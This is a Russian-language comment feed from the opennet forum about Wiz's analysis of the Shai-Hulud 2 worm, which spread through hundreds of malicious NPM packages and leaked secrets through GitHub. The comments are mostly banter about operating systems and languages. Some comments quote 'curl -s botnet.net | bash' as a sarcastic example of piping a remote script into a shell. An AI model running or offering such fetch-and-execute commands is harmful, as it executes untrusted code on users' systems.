https://www.opennet.me/openforum/vsluhforumID3/138568.html Компания Wiz опубликовала результаты анализа следов деятельности червя Shai-Hulud 2, в ходе активности которого в репозитории NPM были опубликованы вредоносные выпуски более 800 пакетов, насчитывающих в сумме более 100 млн загрузок. После установки поражённого пакета, активизировавшийся червь выполняет поиск конфиденциальных данных, публикует новые вредоносные релизы (при обнаружении токена подключения к каталогу NPM) и размещает в открытом доступе найденные в системе конфиденциальные данные через создание новых репозиториев в GitHub...<br><br>Подробнее: https://www.opennet.ru/opennews/art.shtml?num=64377<br> https://www.opennet.me/openforum/vsluhforumID3/138568.html#89 Fri, 12 Dec 2025 08:21:05 GMT да не был ты свидетелем атаки через vim, это мошенники тебя развели<br> https://www.opennet.me/openforum/vsluhforumID3/138568.html#87 Mon, 08 Dec 2025 06:43:07 GMT &gt; обычные получат этого червя через curl&#124;sudo su<br><br>Ну или через dnf install<br> https://www.opennet.me/openforum/vsluhforumID3/138568.html#86 Sun, 07 Dec 2025 20:11:30 GMT &gt; curl -s botnet.net &#124; bash <br><br>там топикстартер (не слишком умный) выдал "не использовать линукс" (чтоб такого вот не было). Я ему показал что совершенно аналогичный подход в венде тоже уже стал абсолютно обычным явлением, не то что юзверьки, а и админы локалхостов ни на секунду не задумываются прежде чем такое вот выполнять (и на промпт uac ответят ок неглядя)<br><br><br> https://www.opennet.me/openforum/vsluhforumID3/138568.html#80 Sun, 07 Dec 2025 11:23:54 GMT И кстати, о встраивании кода слежки продуктами для разработчиков от M$ всем широко известно. Вам это как-то помогло? Вы по-прежнему ими пользуетесь и предоставляете им доступ Сеть со своих корпоративных машин.<br> https://www.opennet.me/openforum/vsluhforumID3/138568.html#79 Sun, 07 Dec 2025 11:18:58 GMT Публичное поле - это лишь вершина айсберга информации об известных уязвимостях в ПО.<br> https://www.opennet.me/openforum/vsluhforumID3/138568.html#78 Sun, 07 Dec 2025 11:15:38 GMT Полагаю, речь не о прямом доступе к памяти, а об SSH-агентах (ssh-add).<br> https://www.opennet.me/openforum/vsluhforumID3/138568.html#77 Sun, 07 Dec 2025 10:27:32 GMT Неверно.<br><br>Коекакерский подход особых проблем не вносит, а если бы вносил - не существовало бы ни одной скриптухи, коей являются все языки за исключением одного. И даже этот один язык не существовал бы в текущем виде, а был бы на порядки менее коекакерским. То же относится и к остальным вещам - ядро, всякая системная херота, вэбчик, хттп(и в целом текст), маздайка, множество "людей", как например тутошние комментаторы и писатели новостей. Шланг ака "топ компилятор сишки". Коекакерство это то, что позволяет существовать всему этому. Нельзя локально уйти от чего-то, что является свойством глобальным. Разве что в каких-то сильно примитивных случаях можно изолированный загончик создать. Но ценность этого околонулевая.<br><br>А вот настоящая проблема раста это продвижение госухой/админ-ресурсом и полная несостоятельность(потому как всё ворованное, даже компилятор и модели памяти/исполнения). Хотя в жаве что-то отдалённо напоминающее также было("убийца сишки", "быстрее сишки"), но там всё было слишком очевидно. Да и в https://www.opennet.me/openforum/vsluhforumID3/138568.html#75 Sat, 06 Dec 2025 14:30:39 GMT Интересно, сколько среди этих линуксоидов вендузятники с WSL? :)<br> https://www.opennet.me/openforum/vsluhforumID3/138568.html#74 Sat, 06 Dec 2025 13:34:30 GMT curl -s botnet.net &#124; bash<br>